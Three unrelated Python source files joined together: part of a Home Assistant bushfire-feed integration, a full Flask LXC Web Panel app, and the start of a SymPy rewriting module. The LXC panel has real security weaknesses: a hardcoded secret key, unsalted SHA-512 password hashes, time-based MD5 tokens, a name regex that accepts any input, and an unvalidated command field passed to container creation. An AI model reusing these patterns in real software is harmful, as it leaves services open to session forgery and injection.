)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the NSW Rural Fire Service Feed platform."""
scan_interval = config.get(CONF_SCAN_INTERVAL, SCAN_INTERVAL)
coordinates = (
config.get(CONF_LATITUDE, hass.config.latitude),
config.get(CONF_LONGITUDE, hass.config.longitude),
)
radius_in_km = config[CONF_RADIUS]
categories = config.get(CONF_CATEGORIES)
# Initialize the entity manager.
manager = NswRuralFireServiceFeedEntityManager(
hass, async_add_entities, scan_interval, coordinates, radius_in_km, categories
)
async def start_feed_manager(event):
"""Start feed manager."""
await manager.async_init()
async def stop_feed_manager(event):
"""Stop feed manager."""
await manager.async_stop()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_feed_manager)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_feed_manager)
hass.async_create_task(manager.async_update())
class NswRuralFireServiceFeedEntityManager:
"""Feed Entity Manager for NSW Rural Fire Service GeoJSON feed."""
def __init__(
self,
hass,
async_add_entities,
scan_interval,
coordinates,
radius_in_km,
categories,
):
"""Initialize the Feed Entity Manager."""
self._hass = hass
websession = aiohttp_client.async_get_clientsession(hass)
self._feed_manager = NswRuralFireServiceIncidentsFeedManager(
websession,
self._generate_entity,
self._update_entity,
self._remove_entity,
coordinates,
filter_radius=radius_in_km,
filter_categories=categories,
)
self._async_add_entities = async_add_entities
self._scan_interval = scan_interval
self._track_time_remove_callback = None
async def async_init(self):
"""Schedule initial and regular updates based on configured time interval."""
async def update(event_time):
"""Update."""
await self.async_update()
# Trigger updates at regular intervals.
self._track_time_remove_callback = async_track_time_interval(
self._hass, update, self._scan_interval
)
_LOGGER.debug("Feed entity manager initialized")
async def async_update(self):
"""Refresh data."""
await self._feed_manager.update()
_LOGGER.debug("Feed entity manager updated")
async def async_stop(self):
"""Stop this feed entity manager from refreshing."""
if self._track_time_remove_callback:
self._track_time_remove_callback()
_LOGGER.debug("Feed entity manager stopped")
def get_entry(self, external_id):
"""Get feed entry by external id."""
return self._feed_manager.feed_entries.get(external_id)
async def _generate_entity(self, external_id):
"""Generate new entity."""
new_entity = NswRuralFireServiceLocationEvent(self, external_id)
# Add new entities to HA.
self._async_add_entities([new_entity], True)
async def _update_entity(self, external_id):
"""Update entity."""
async_dispatcher_send(self._hass, SIGNAL_UPDATE_ENTITY.format(external_id))
async def _remove_entity(self, external_id):
"""Remove entity."""
async_dispatcher_send(self._hass, SIGNAL_DELETE_ENTITY.format(external_id))
class NswRuralFireServiceLocationEvent(GeolocationEvent):
"""This represents an external event with NSW Rural Fire Service data."""
def __init__(self, feed_manager, external_id):
"""Initialize entity with data from feed entry."""
self._feed_manager = feed_manager
self._external_id = external_id
self._name = None
self._distance = None
self._latitude = None
self._longitude = None
self._attribution = None
self._category = None
self._publication_date = None
self._location = None
self._council_area = None
self._status = None
self._type = None
self._fire = None
self._size = None
self._responsible_agency = None
self._remove_signal_delete = None
self._remove_signal_update = None
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self._remove_signal_delete = async_dispatcher_connect(
self.hass,
SIGNAL_DELETE_ENTITY.format(self._external_id),
self._delete_callback,
)
self._remove_signal_update = async_dispatcher_connect(
self.hass,
SIGNAL_UPDATE_ENTITY.format(self._external_id),
self._update_callback,
)
async def async_will_remove_from_hass(self) -> None:
"""Call when entity will be removed from hass."""
self._remove_signal_delete()
self._remove_signal_update()
@callback
def _delete_callback(self):
"""Remove this entity."""
self.hass.async_create_task(self.async_remove(force_remove=True))
@callback
def _update_callback(self):
"""Call update method."""
self.async_schedule_update_ha_state(True)
@property
def should_poll(self):
"""No polling needed for NSW Rural Fire Service location events."""
return False
async def async_update(self):
"""Update this entity from the data held in the feed manager."""
_LOGGER.debug("Updating %s", self._external_id)
feed_entry = self._feed_manager.get_entry(self._external_id)
if feed_entry:
self._update_from_feed(feed_entry)
def _update_from_feed(self, feed_entry):
"""Update the internal state from the provided feed entry."""
self._name = feed_entry.title
self._distance = feed_entry.distance_to_home
self._latitude = feed_entry.coordinates[0]
self._longitude = feed_entry.coordinates[1]
self._attribution = feed_entry.attribution
self._category = feed_entry.category
self._publication_date = feed_entry.publication_date
self._location = feed_entry.location
self._council_area = feed_entry.council_area
self._status = feed_entry.status
self._type = feed_entry.type
self._fire = feed_entry.fire
self._size = feed_entry.size
self._responsible_agency = feed_entry.responsible_agency
@property
def icon(self):
"""Return the icon to use in the frontend."""
if self._fire:
return "mdi:fire"
return "mdi:alarm-light"
@property
def source(self) -> str:
"""Return source value of this external event."""
return SOURCE
@property
def name(self) -> str | None:
"""Return the name of the entity."""
return self._name
@property
def distance(self) -> float | None:
"""Return distance value of this external event."""
return self._distance
@property
def latitude(self) -> float | None:
"""Return latitude value of this external event."""
return self._latitude
@property
def longitude(self) -> float | None:
"""Return longitude value of this external event."""
return self._longitude
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return LENGTH_KILOMETERS
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
attributes = {}
for key, value in (
(ATTR_EXTERNAL_ID, self._external_id),
(ATTR_CATEGORY, self._category),
(ATTR_LOCATION, self._location),
(ATTR_ATTRIBUTION, self._attribution),
(ATTR_PUBLICATION_DATE, self._publication_date),
(ATTR_COUNCIL_AREA, self._council_area),
(ATTR_STATUS, self._status),
(ATTR_TYPE, self._type),
(ATTR_FIRE, self._fire),
(ATTR_SIZE, self._size),
(ATTR_RESPONSIBLE_AGENCY, self._responsible_agency),
):
if value or isinstance(value, bool):
attributes[key] = value
return attributes
|
|
# LXC Python Library
# for compatibility with LXC 0.8 and 0.9
# on Ubuntu 12.04/12.10/13.04
# Author: Elie Deloumeau
# Contact: elie@deloumeau.fr
# The MIT License (MIT)
# Copyright (c) 2013 Elie Deloumeau
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import lxclite as lxc
import lwp
import subprocess
import time
import re
import hashlib
import sqlite3
import os
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, jsonify
try:
import configparser
except ImportError:
import ConfigParser as configparser
# configuration
config = configparser.SafeConfigParser()
config.readfp(open('lwp.conf'))
SECRET_KEY = '\xb13\xb6\xfb+Z\xe8\xd1n\x80\x9c\xe7KM' \
'\x1c\xc1\xa7\xf8\xbeY\x9a\xfa<.'
DEBUG = config.getboolean('global', 'debug')
DATABASE = config.get('database', 'file')
ADDRESS = config.get('global', 'address')
PORT = int(config.get('global', 'port'))
# Flask app
app = Flask(__name__)
app.config.from_object(__name__)
def connect_db():
'''
SQLite3 connect function
'''
return sqlite3.connect(app.config['DATABASE'])
@app.before_request
def before_request():
'''
executes functions before all requests
'''
check_session_limit()
g.db = connect_db()
@app.teardown_request
def teardown_request(exception):
'''
executes functions after all requests
'''
if hasattr(g, 'db'):
g.db.close()
@app.route('/')
@app.route('/home')
def home():
'''
home page function
'''
if 'logged_in' in session:
listx = lxc.listx()
containers_all = []
for status in ['RUNNING', 'FROZEN', 'STOPPED']:
containers_by_status = []
for container in listx[status]:
containers_by_status.append({
'name': container,
'memusg': lwp.memory_usage(container),
'settings': lwp.get_container_settings(container)
})
containers_all.append({
'status': status.lower(),
'containers': containers_by_status
})
return render_template('index.html', containers=lxc.ls(),
containers_all=containers_all,
dist=lwp.check_ubuntu(),
templates=lwp.get_templates_list())
return render_template('login.html')
@app.route('/about')
def about():
'''
about page
'''
if 'logged_in' in session:
return render_template('about.html', containers=lxc.ls(),
version=lwp.check_version())
return render_template('login.html')
@app.route('/<container>/edit', methods=['POST', 'GET'])
def edit(container=None):
'''
edit containers page and actions if form post request
'''
if 'logged_in' in session:
host_memory = lwp.host_memory_usage()
if request.method == 'POST':
cfg = lwp.get_container_settings(container)
ip_regex = '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]' \
'|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4]' \
'[0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]' \
'?[0-9][0-9]?)(/(3[0-2]|[12]?[0-9]))?'
info = lxc.info(container)
form = {}
form['type'] = request.form['type']
form['link'] = request.form['link']
try:
form['flags'] = request.form['flags']
except KeyError:
form['flags'] = 'down'
form['hwaddr'] = request.form['hwaddress']
form['rootfs'] = request.form['rootfs']
form['utsname'] = request.form['hostname']
form['ipv4'] = request.form['ipaddress']
form['memlimit'] = request.form['memlimit']
form['swlimit'] = request.form['swlimit']
form['cpus'] = request.form['cpus']
form['shares'] = request.form['cpushares']
try:
form['autostart'] = request.form['autostart']
except KeyError:
form['autostart'] = False
if form['utsname'] != cfg['utsname'] and \
re.match('(?!^containers$)|^(([a-zA-Z0-9]|[a-zA-Z0-9]'
'[a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|'
'[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$',
form['utsname']):
lwp.push_config_value('lxc.utsname', form['utsname'],
container=container)
flash(u'Hostname updated for %s!' % container, 'success')
if form['flags'] != cfg['flags'] and \
re.match('^(up|down)$', form['flags']):
lwp.push_config_value('lxc.network.flags', form['flags'],
container=container)
flash(u'Network flag updated for %s!' % container, 'success')
if form['type'] != cfg['type'] and \
re.match('^\w+$', form['type']):
lwp.push_config_value('lxc.network.type', form['type'],
container=container)
flash(u'Link type updated for %s!' % container, 'success')
if form['link'] != cfg['link'] and \
re.match('^[a-zA-Z0-9_-]+$', form['link']):
lwp.push_config_value('lxc.network.link', form['link'],
container=container)
flash(u'Link name updated for %s!' % container, 'success')
if form['hwaddr'] != cfg['hwaddr'] and \
re.match('^([a-fA-F0-9]{2}[:|\-]?){6}$', form['hwaddr']):
lwp.push_config_value('lxc.network.hwaddr', form['hwaddr'],
container=container)
flash(u'Hardware address updated for %s!' % container,
'success')
if (not form['ipv4'] and form['ipv4'] != cfg['ipv4']) or \
(form['ipv4'] != cfg['ipv4'] and
re.match('^%s$' % ip_regex, form['ipv4'])):
lwp.push_config_value('lxc.network.ipv4', form['ipv4'],
container=container)
flash(u'IP address updated for %s!' % container, 'success')
if form['memlimit'] != cfg['memlimit'] and \
form['memlimit'].isdigit() and \
int(form['memlimit']) <= int(host_memory['total']):
if int(form['memlimit']) == int(host_memory['total']):
form['memlimit'] = ''
if form['memlimit'] != cfg['memlimit']:
lwp.push_config_value('lxc.cgroup.memory.limit_in_bytes',
form['memlimit'],
container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container,
'lxc.cgroup.memory.limit_in_bytes',
form['memlimit'])
flash(u'Memory limit updated for %s!' % container,
'success')
if form['swlimit'] != cfg['swlimit'] and \
form['swlimit'].isdigit() and \
int(form['swlimit']) <= int(host_memory['total'] * 2):
if int(form['swlimit']) == int(host_memory['total'] * 2):
form['swlimit'] = ''
if form['swlimit'].isdigit():
form['swlimit'] = int(form['swlimit'])
if form['memlimit'].isdigit():
form['memlimit'] = int(form['memlimit'])
if (form['memlimit'] == '' and form['swlimit'] != '') or \
(form['memlimit'] > form['swlimit'] and
form['swlimit'] != ''):
flash(u'Can\'t assign swap memory lower than'
' the memory limit', 'warning')
elif form['swlimit'] != cfg['swlimit'] and \
form['memlimit'] <= form['swlimit']:
lwp.push_config_value(
'lxc.cgroup.memory.memsw.limit_in_bytes',
form['swlimit'], container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container,
'lxc.cgroup.memory.memsw.limit_in_bytes',
form['swlimit'])
flash(u'Swap limit updated for %s!' % container, 'success')
if (not form['cpus'] and form['cpus'] != cfg['cpus']) or \
(form['cpus'] != cfg['cpus'] and
re.match('^[0-9,-]+$', form['cpus'])):
lwp.push_config_value('lxc.cgroup.cpuset.cpus', form['cpus'],
container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container, 'lxc.cgroup.cpuset.cpus',
form['cpus'])
flash(u'CPUs updated for %s!' % container, 'success')
if (not form['shares'] and form['shares'] != cfg['shares']) or \
(form['shares'] != cfg['shares'] and
re.match('^[0-9]+$', form['shares'])):
lwp.push_config_value('lxc.cgroup.cpu.shares', form['shares'],
container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container, 'lxc.cgroup.cpu.shares',
form['shares'])
flash(u'CPU shares updated for %s!' % container, 'success')
if form['rootfs'] != cfg['rootfs'] and \
re.match('^[a-zA-Z0-9_/\-]+', form['rootfs']):
lwp.push_config_value('lxc.rootfs', form['rootfs'],
container=container)
flash(u'Rootfs updated!' % container, 'success')
auto = lwp.ls_auto()
if form['autostart'] == 'True' and \
not ('%s.conf' % container) in auto:
try:
os.symlink('/var/lib/lxc/%s/config' % container,
'/etc/lxc/auto/%s.conf' % container)
flash(u'Autostart enabled for %s' % container, 'success')
except OSError:
flash(u'Unable to create symlink \'/etc/lxc/auto/%s.conf\''
% container, 'error')
elif not form['autostart'] and ('%s.conf' % container) in auto:
try:
os.remove('/etc/lxc/auto/%s.conf' % container)
flash(u'Autostart disabled for %s' % container, 'success')
except OSError:
flash(u'Unable to remove symlink', 'error')
info = lxc.info(container)
status = info['state']
pid = info['pid']
infos = {'status': status,
'pid': pid,
'memusg': lwp.memory_usage(container)}
return render_template('edit.html', containers=lxc.ls(),
container=container, infos=infos,
settings=lwp.get_container_settings(container),
host_memory=host_memory)
return render_template('login.html')
@app.route('/settings/lxc-net', methods=['POST', 'GET'])
def lxc_net():
'''
lxc-net (/etc/default/lxc) settings page and actions if form post request
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
if request.method == 'POST':
if lxc.running() == []:
cfg = lwp.get_net_settings()
ip_regex = '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]' \
'|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4]' \
'[0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|' \
'[01]?[0-9][0-9]?)'
form = {}
try:
form['use'] = request.form['use']
except KeyError:
form['use'] = 'false'
try:
form['bridge'] = request.form['bridge']
except KeyError:
form['bridge'] = None
try:
form['address'] = request.form['address']
except KeyError:
form['address'] = None
try:
form['netmask'] = request.form['netmask']
except KeyError:
form['netmask'] = None
try:
form['network'] = request.form['network']
except KeyError:
form['network'] = None
try:
form['range'] = request.form['range']
except KeyError:
form['range'] = None
try:
form['max'] = request.form['max']
except KeyError:
form['max'] = None
if form['use'] == 'true' and form['use'] != cfg['use']:
lwp.push_net_value('USE_LXC_BRIDGE', 'true')
elif form['use'] == 'false' and form['use'] != cfg['use']:
lwp.push_net_value('USE_LXC_BRIDGE', 'false')
if form['bridge'] and form['bridge'] != cfg['bridge'] \
and re.match('^[a-zA-Z0-9_-]+$', form['bridge']):
lwp.push_net_value('LXC_BRIDGE', form['bridge'])
if form['address'] and form['address'] != cfg['address'] \
and re.match('^%s$' % ip_regex, form['address']):
lwp.push_net_value('LXC_ADDR', form['address'])
if form['netmask'] and form['netmask'] != cfg['netmask'] \
and re.match('^%s$' % ip_regex, form['netmask']):
lwp.push_net_value('LXC_NETMASK', form['netmask'])
if form['network'] and form['network'] != cfg['network'] and \
re.match('^%s(?:/\d{1,2}|)$' % ip_regex,
form['network']):
lwp.push_net_value('LXC_NETWORK', form['network'])
if form['range'] and form['range'] != cfg['range'] and \
re.match('^%s,%s$' % (ip_regex, ip_regex),
form['range']):
lwp.push_net_value('LXC_DHCP_RANGE', form['range'])
if form['max'] and form['max'] != cfg['max'] and \
re.match('^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$',
form['max']):
lwp.push_net_value('LXC_DHCP_MAX', form['max'])
if lwp.net_restart() == 0:
flash(u'LXC Network settings applied successfully!',
'success')
else:
flash(u'Failed to restart LXC networking.', 'error')
else:
flash(u'Stop all containers before restart lxc-net.',
'warning')
return render_template('lxc-net.html', containers=lxc.ls(),
cfg=lwp.get_net_settings(),
running=lxc.running())
return render_template('login.html')
@app.route('/lwp/users', methods=['POST', 'GET'])
def lwp_users():
'''
returns users and get posts request : can edit or add user in page.
this funtction uses sqlite3
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
try:
trash = request.args.get('trash')
except KeyError:
trash = 0
su_users = query_db("SELECT COUNT(id) as num FROM users "
"WHERE su='Yes'", [], one=True)
if request.args.get('token') == session.get('token') and \
int(trash) == 1 and request.args.get('userid') and \
request.args.get('username'):
nb_users = query_db("SELECT COUNT(id) as num FROM users", [],
one=True)
if nb_users['num'] > 1:
if su_users['num'] <= 1:
su_user = query_db("SELECT username FROM users "
"WHERE su='Yes'", [], one=True)
if su_user['username'] == request.args.get('username'):
flash(u'Can\'t delete the last admin user : %s' %
request.args.get('username'), 'error')
return redirect(url_for('lwp_users'))
g.db.execute("DELETE FROM users WHERE id=? AND username=?",
[request.args.get('userid'),
request.args.get('username')])
g.db.commit()
flash(u'Deleted %s' % request.args.get('username'), 'success')
return redirect(url_for('lwp_users'))
flash(u'Can\'t delete the last user!', 'error')
return redirect(url_for('lwp_users'))
if request.method == 'POST':
users = query_db('SELECT id, name, username, su FROM users '
'ORDER BY id ASC')
if request.form['newUser'] == 'True':
if not request.form['username'] in \
[user['username'] for user in users]:
if re.match('^\w+$', request.form['username']) and \
request.form['password1']:
if request.form['password1'] == \
request.form['password2']:
if request.form['name']:
if re.match('[a-z A-Z0-9]{3,32}',
request.form['name']):
g.db.execute(
"INSERT INTO users "
"(name, username, password) "
"VALUES (?, ?, ?)",
[request.form['name'],
request.form['username'],
hash_passwd(
request.form['password1'])])
g.db.commit()
else:
flash(u'Invalid name!', 'error')
else:
g.db.execute("INSERT INTO users "
"(username, password) VALUES "
"(?, ?)",
[request.form['username'],
hash_passwd(
request.form['password1'])])
g.db.commit()
flash(u'Created %s' % request.form['username'],
'success')
else:
flash(u'No password match', 'error')
else:
flash(u'Invalid username or password!', 'error')
else:
flash(u'Username already exist!', 'error')
elif request.form['newUser'] == 'False':
if request.form['password1'] == request.form['password2']:
if re.match('[a-z A-Z0-9]{3,32}', request.form['name']):
if su_users['num'] <= 1:
su = 'Yes'
else:
try:
su = request.form['su']
except KeyError:
su = 'No'
if not request.form['name']:
g.db.execute("UPDATE users SET name='', su=? "
"WHERE username=?",
[su, request.form['username']])
g.db.commit()
elif request.form['name'] and \
not request.form['password1'] and \
not request.form['password2']:
g.db.execute("UPDATE users SET name=?, su=? "
"WHERE username=?",
[request.form['name'], su,
request.form['username']])
g.db.commit()
elif request.form['name'] and \
request.form['password1'] and \
request.form['password2']:
g.db.execute("UPDATE users SET "
"name=?, password=?, su=? WHERE "
"username=?",
[request.form['name'],
hash_passwd(
request.form['password1']),
su, request.form['username']])
g.db.commit()
elif request.form['password1'] and \
request.form['password2']:
g.db.execute("UPDATE users SET password=?, su=? "
"WHERE username=?",
[hash_passwd(
request.form['password1']),
su, request.form['username']])
g.db.commit()
flash(u'Updated', 'success')
else:
flash(u'Invalid name!', 'error')
else:
flash(u'No password match', 'error')
else:
flash(u'Unknown error!', 'error')
users = query_db("SELECT id, name, username, su FROM users "
"ORDER BY id ASC")
nb_users = query_db("SELECT COUNT(id) as num FROM users", [], one=True)
su_users = query_db("SELECT COUNT(id) as num FROM users "
"WHERE su='Yes'", [], one=True)
return render_template('users.html', containers=lxc.ls(), users=users,
nb_users=nb_users, su_users=su_users)
return render_template('login.html')
@app.route('/checkconfig')
def checkconfig():
'''
returns the display of lxc-checkconfig command
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
return render_template('checkconfig.html', containers=lxc.ls(),
cfg=lxc.checkconfig())
return render_template('login.html')
@app.route('/action', methods=['GET'])
def action():
'''
manage all actions related to containers
lxc-start, lxc-stop, etc...
'''
if 'logged_in' in session:
if request.args['token'] == session.get('token'):
action = request.args['action']
name = request.args['name']
if action == 'start':
try:
if lxc.start(name) == 0:
# Fix bug : "the container is randomly not
# displayed in overview list after a boot"
time.sleep(1)
flash(u'Container %s started successfully!' % name,
'success')
else:
flash(u'Unable to start %s!' % name, 'error')
except lxc.ContainerAlreadyRunning:
flash(u'Container %s is already running!' % name, 'error')
elif action == 'stop':
try:
if lxc.stop(name) == 0:
flash(u'Container %s stopped successfully!' % name,
'success')
else:
flash(u'Unable to stop %s!' % name, 'error')
except lxc.ContainerNotRunning:
flash(u'Container %s is already stopped!' % name, 'error')
elif action == 'freeze':
try:
if lxc.freeze(name) == 0:
flash(u'Container %s frozen successfully!' % name,
'success')
else:
flash(u'Unable to freeze %s!' % name, 'error')
except lxc.ContainerNotRunning:
flash(u'Container %s not running!' % name, 'error')
elif action == 'unfreeze':
try:
if lxc.unfreeze(name) == 0:
flash(u'Container %s unfrozen successfully!' % name,
'success')
else:
flash(u'Unable to unfeeze %s!' % name, 'error')
except lxc.ContainerNotRunning:
flash(u'Container %s not frozen!' % name, 'error')
elif action == 'destroy':
if session['su'] != 'Yes':
return abort(403)
try:
if lxc.destroy(name) == 0:
flash(u'Container %s destroyed successfully!' % name,
'success')
else:
flash(u'Unable to destroy %s!' % name, 'error')
except lxc.ContainerDoesntExists:
flash(u'The Container %s does not exists!' % name, 'error')
elif action == 'reboot' and name == 'host':
if session['su'] != 'Yes':
return abort(403)
msg = '\v*** LXC Web Panel *** \
\nReboot from web panel'
try:
subprocess.check_call('/sbin/shutdown -r now \'%s\'' % msg,
shell=True)
flash(u'System will now restart!', 'success')
except:
flash(u'System error!', 'error')
try:
if request.args['from'] == 'edit':
return redirect('../%s/edit' % name)
else:
return redirect(url_for('home'))
except:
return redirect(url_for('home'))
return render_template('login.html')
@app.route('/action/create-container', methods=['GET', 'POST'])
def create_container():
'''
verify all forms to create a container
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
if request.method == 'POST':
name = request.form['name']
template = request.form['template']
command = request.form['command']
if re.match('^(?!^containers$)|[a-zA-Z0-9_-]+$', name):
storage_method = request.form['backingstore']
if storage_method == 'default':
try:
if lxc.create(name, template=template,
xargs=command) == 0:
flash(u'Container %s created successfully!' % name,
'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The Container %s is already created!' % name,
'error')
except subprocess.CalledProcessError:
flash(u'Error!' % name, 'error')
elif storage_method == 'directory':
directory = request.form['dir']
if re.match('^/[a-zA-Z0-9_/-]+$', directory) and \
directory != '':
try:
if lxc.create(name, template=template,
storage='dir --dir %s' % directory,
xargs=command) == 0:
flash(u'Container %s created successfully!'
% name, 'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The Container %s is already created!'
% name, 'error')
except subprocess.CalledProcessError:
flash(u'Error!' % name, 'error')
elif storage_method == 'zfs':
zfs = request.form['zpoolname']
if re.match('^[a-zA-Z0-9_/-]+$', zfs) and zfs != '':
try:
if lxc.create(name, template=template, storage='zfs --zfsroot %s' % zfs, xargs=command) == 0:
flash(u'Container %s created successfully!' % name, 'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The Container %s is already created!' % name, 'error')
except subprocess.CalledProcessError:
flash(u'Error!' % name, 'error')
elif storage_method == 'lvm':
lvname = request.form['lvname']
vgname = request.form['vgname']
fstype = request.form['fstype']
fssize = request.form['fssize']
storage_options = 'lvm'
if re.match('^[a-zA-Z0-9_-]+$', lvname) and lvname != '':
storage_options += ' --lvname %s' % lvname
if re.match('^[a-zA-Z0-9_-]+$', vgname) and vgname != '':
storage_options += ' --vgname %s' % vgname
if re.match('^[a-z0-9]+$', fstype) and fstype != '':
storage_options += ' --fstype %s' % fstype
if re.match('^[0-9][G|M]$', fssize) and fssize != '':
storage_options += ' --fssize %s' % fssize
try:
if lxc.create(name, template=template,
storage=storage_options,
xargs=command) == 0:
flash(u'Container %s created successfully!' % name,
'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The container/logical volume %s is '
'already created!' % name, 'error')
except subprocess.CalledProcessError:
flash(u'Error!' % name, 'error')
else:
flash(u'Missing parameters to create container!', 'error')
else:
if name == '':
flash(u'Please enter a container name!', 'error')
else:
flash(u'Invalid name for \"%s\"!' % name, 'error')
return redirect(url_for('home'))
return render_template('login.html')
@app.route('/action/clone-container', methods=['GET', 'POST'])
def clone_container():
'''
verify all forms to clone a container
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
if request.method == 'POST':
orig = request.form['orig']
name = request.form['name']
try:
snapshot = request.form['snapshot']
if snapshot == 'True':
snapshot = True
except KeyError:
snapshot = False
if re.match('^(?!^containers$)|[a-zA-Z0-9_-]+$', name):
out = None
try:
out = lxc.clone(orig=orig, new=name, snapshot=snapshot)
except lxc.ContainerAlreadyExists:
flash(u'The Container %s already exists!' % name, 'error')
except subprocess.CalledProcessError:
flash(u'Can\'t snapshot a directory', 'error')
if out and out == 0:
flash(u'Container %s cloned into %s successfully!'
% (orig, name), 'success')
elif out and out != 0:
flash(u'Failed to clone %s into %s!' % (orig, name),
'error')
else:
if name == '':
flash(u'Please enter a container name!', 'error')
else:
flash(u'Invalid name for \"%s\"!' % name, 'error')
return redirect(url_for('home'))
return render_template('login.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
request_username = request.form['username']
request_passwd = hash_passwd(request.form['password'])
current_url = request.form['url']
user = query_db('select name, username, su from users where username=?'
'and password=?', [request_username, request_passwd],
one=True)
if user:
session['logged_in'] = True
session['token'] = get_token()
session['last_activity'] = int(time.time())
session['username'] = user['username']
session['name'] = user['name']
session['su'] = user['su']
flash(u'You are logged in!', 'success')
if current_url == url_for('login'):
return redirect(url_for('home'))
return redirect(current_url)
flash(u'Invalid username or password!', 'error')
return render_template('login.html')
@app.route('/logout')
def logout():
session.pop('logged_in', None)
session.pop('token', None)
session.pop('last_activity', None)
session.pop('username', None)
session.pop('name', None)
session.pop('su', None)
flash(u'You are logged out!', 'success')
return redirect(url_for('login'))
@app.route('/_refresh_cpu_host')
def refresh_cpu_host():
if 'logged_in' in session:
return lwp.host_cpu_percent()
@app.route('/_refresh_uptime_host')
def refresh_uptime_host():
if 'logged_in' in session:
return jsonify(lwp.host_uptime())
@app.route('/_refresh_disk_host')
def refresh_disk_host():
if 'logged_in' in session:
return jsonify(lwp.host_disk_usage(partition=config.get('overview',
'partition')))
@app.route('/_refresh_memory_<name>')
def refresh_memory_containers(name=None):
if 'logged_in' in session:
if name == 'containers':
containers_running = lxc.running()
containers = []
for container in containers_running:
container = container.replace(' (auto)', '')
containers.append({'name': container,
'memusg': lwp.memory_usage(container)})
return jsonify(data=containers)
elif name == 'host':
return jsonify(lwp.host_memory_usage())
return jsonify({'memusg': lwp.memory_usage(name)})
@app.route('/_check_version')
def check_version():
if 'logged_in' in session:
return jsonify(lwp.check_version())
def hash_passwd(passwd):
return hashlib.sha512(passwd.encode()).hexdigest()
def get_token():
return hashlib.md5(str(time.time()).encode()).hexdigest()
def query_db(query, args=(), one=False):
cur = g.db.execute(query, args)
rv = [dict((cur.description[idx][0], value)
for idx, value in enumerate(row)) for row in cur.fetchall()]
return (rv[0] if rv else None) if one else rv
def check_session_limit():
if 'logged_in' in session and session.get('last_activity') is not None:
now = int(time.time())
limit = now - 60 * int(config.get('session', 'time'))
last_activity = session.get('last_activity')
if last_activity < limit:
flash(u'Session timed out !', 'info')
logout()
else:
session['last_activity'] = now
if __name__ == '__main__':
app.run(host=app.config['ADDRESS'], port=app.config['PORT'])
|
|
"""Module 'rewrite.py' contains advanced term rewriting methods concerning
partial fraction decomposition, combining together and collecting terms.
"""
from sympy.core.add import Add
from sympy.core.mul import Mul
from sympy.core.power import Pow
from sympy.core.relational import Relational
from sympy.core.symbol import Symbol, Temporary
from sympy.core.numbers import Integer, Rational
from sympy.core.function import Function, Lambda
from sympy.core.basic import Basic, S, C, Atom, sympify
from sympy.utilities import threaded
from sympy.simplify import together
from sympy.functions import exp
from sympy.polys import Poly, RootSum, div, quo, gcd
from sympy.polys.algorithms import poly_quo, poly_rem, \
poly_sqf, poly_gcd, poly_half_gcdex
@threaded()
def cancel(f, *symbols):
"""Cancel common factors in a given rational function.
Given a quotient of polynomials, performing only gcd and quo
operations in polynomial algebra, return rational function
with numerator and denominator of minimal total degree in
an expanded form.
For all other kinds of expressions the input is returned in
an unchanged form. Note however, that 'cancel' function can
thread over sums and relational operators.
Additionally you can specify a list of variables to perform
cancellation more efficiently using only those symbols.
>>> from sympy import cancel, sqrt
>>> from sympy.abc import x, y
>>> cancel((x**2-1)/(x-1))
1 + x
>>> cancel((x**2-y**2)/(x-y), x)
x + y
>>> cancel((x**2-2)/(x+sqrt(2)))
x - 2**(1/2)
"""
return Poly.cancel(f, *symbols)
def trim(f, *symbols, **flags):
"""Cancel common factors in a given formal rational expression.
Given an arbitrary expression, map all functional components
